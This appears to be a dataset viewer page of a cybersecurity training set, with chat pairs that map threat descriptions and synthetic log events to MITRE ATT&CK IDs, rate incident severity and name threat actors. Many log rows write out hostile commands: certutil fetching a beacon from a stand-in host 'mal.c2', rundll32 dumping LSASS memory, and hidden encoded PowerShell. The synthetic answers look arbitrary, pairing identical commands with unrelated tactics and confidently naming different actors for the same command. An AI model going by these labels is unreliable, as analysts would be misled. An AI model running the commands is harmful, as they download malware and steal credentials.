messages
listlengths
2
2
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Users should not have permission to modify these in most cases.", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1055.009\", \"T1055\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 937 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.42.138.47", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-E4L01PVRQ0)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity\": \"Cr...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Janicab used a valid AppleDeveloperID to sign the code to get past security restrictions.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1553\", \"T1553.002\"]}", "role": "assistant" ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Empire can leverage WMI debugging to remotely replace binaries like sethc.exe, Utilman.exe, and Magnify.exe with cmd.exe.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techni...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-M7959OGKRZ)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Defense Evasion, Credential Access", "role": "user" }...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Symantec and Norton products offer the following detections: Antivirus Backdoor.Pirpi Backdoor.Pirpi!dr Backdoor.Pirpi!gen1 Backdoor.Pirpi!gen2 Backdoor.Pirpi!gen3 Backdoor.Pirpi!gen4 Backdoor.Pirpi.A Backdoor.Pirpi.B Backdoor.Pirpi.C...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.8.189.162", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-Z0XSB1R2N6)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Exfiltration, Impact, Discovery", "role": "user" }, { "content": "{\"seve...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"Volt Typ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-SB7WDZ9JF7)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Collection, Exfiltration", "role": "user" }, ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: TrickBot collects local files and information from the victim’s local machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1005\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-EJAGIHYITS)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Privilege Escalation, Execution, Command and Control", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-2GRWZTIJ7N)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Impact, Persistence", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-UPKHS2QPMG)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Execution, Discovery", "role": "user" }, { "conte...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-XVVCKAVSID)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Collection, Command and Control", "role": "user" }, { "c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-XR48WF980M)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Privilege Escalation, Credential Access", "role": "user...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2265 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.91.186.30", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0007...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Cuba can discover shared resources using the NetShareEnum API call.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1135\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.135.72.184", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-ERO1H0A387)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation, Discovery, Collection", "role": "user" }, { "co...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: load additional modules", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1129\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Pteranodon can delete files that may interfere with it executing.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"con...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.28.46.201", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0003\"], \"techniques\": ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Configure settings for scheduled tasks to force tasks to run under the context of the authenticated account instead of allowing them to run as SYSTEM.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0003\",...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3555 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"con...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-EY5T37H516)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Impact, Collection", "role": "user" }, { "content...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Pand...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: FIN6 has obtained and used tools such as Mimikatz, Cobalt Strike, and AdFind.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1588\", \"T1588.002\"]}", "role": "assis...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: SharpStage has the ability to capture the victim's screen.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1113\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-6SN1RBKXYY)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Execution, Impact, Reconnaissance", "role": "user" }, { "content": "...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1647 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.5.235.53", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0005\", \"TA0007\"], \"tec...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3009 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1233 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.95.203.88", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"techniques...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1168 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.159.12.220", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.33.30.236", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2486 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-C0E5PZ3X77)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"High\", \"busi...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 782 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.50.154.121", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0008\", \"TA0001\"], \"te...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-AEIJOM6HN2)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Credential Access, Command and Control, Exfiltration", "role": "user" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-WWKD7QBQN6)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1464 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.75.114.230", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-8SUL3R29ZG)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Exfiltration, Command and Control", "role": "user" }, ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Cobalt Strike can enumerate services on compromised hosts.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1007\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded.", "role": "user" }, { "content": ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Hildegard has used the BOtB tool which exploits CVE-2019-5736.", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"techniques\": [\"T1068\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\": \"Hig...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang P...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"confidence\": ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Use multi-factor authentication for logons to code repositories.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1213\", \"T1213.003\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-A49ZY2HXHJ)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Command and Control, Reconnaissance, Privilege Escalation", "role": "user" }...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3570 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.77.9.53", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0011\",...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.18.105.162", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.112.61.193", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3588 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.84.21.143", "role": "user" }, { "content": "{\"tactics\": [\"TA0005...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2179 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.164.241.240", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0043\"],...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\": \"High\"}",...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-3DN3JXIEOK)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Command and Control, Credential Access", "role": "us...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-JO2L7CWH05)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Collection, Command and Control", "role": "user" }, { "content":...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.94.249.13", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0002\"], \"technique...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-M7K5820VTF)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Discovery", "role": "user" }, { "content": ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Variable Name Description gdu Google Drive URL for downloading files to the Google Drive account gduu Google Drive URL for uploading files to the Google Drive account gdue Google Drive URL for updating a file o...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-BYDK3RMQHW)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.181.94.18", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0007\"], ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 3113 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.149.29.94", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1484.001...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.86.122.114", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.33.51.226", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0043\"], \"techniqu...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.68.4.254", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"t...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: CharmPower can remove persistence-related artifacts from the Registry.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1112\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2073 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"conf...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.36.18.179", "role": "user" }, { "content": "{\"tactics\": [\"T...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-18G6MV0R9R)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Collection, Lateral Movement, Privilege Escalation", "role": "user" }, ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2001 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.103.231.214", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0007\", \"TA0009\"], \"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.102.154.219", "role": "user" }, { "content": "{\"tactics\": [...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-3ETM3HLA3R)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Credential Access, Initial Access, Execution", "role": "user"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: BackConfig has the ability to remove files and folders related to previous infections.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}", "role": "assistant" } ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-2DKQH7D8ZT)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Execution, Exfiltration, Lateral Movement", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"co...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Ecipekac has the ability to decrypt fileless loader modules.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Frankenstein has run encoded commands from the command line.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-XAUSIQEZ7S)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-VQMYACJUCH)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 693 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidenc...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.89.248.132", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0004\"], \"tech...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-K0U5PFO90C)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Execution", "role": "user" }, { "cont...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-ZVRHQD3TM6)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Discovery, Execution, Defense Evasion", "role": "user" }, { ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.170.105.145", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-YQP983AJ1Y)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Command and Control, Defense Evasion, Credential Access", "role": "user" }...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Dragonfly has collected data from local victim systems.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1005\"]}", "role": "assistant" } ]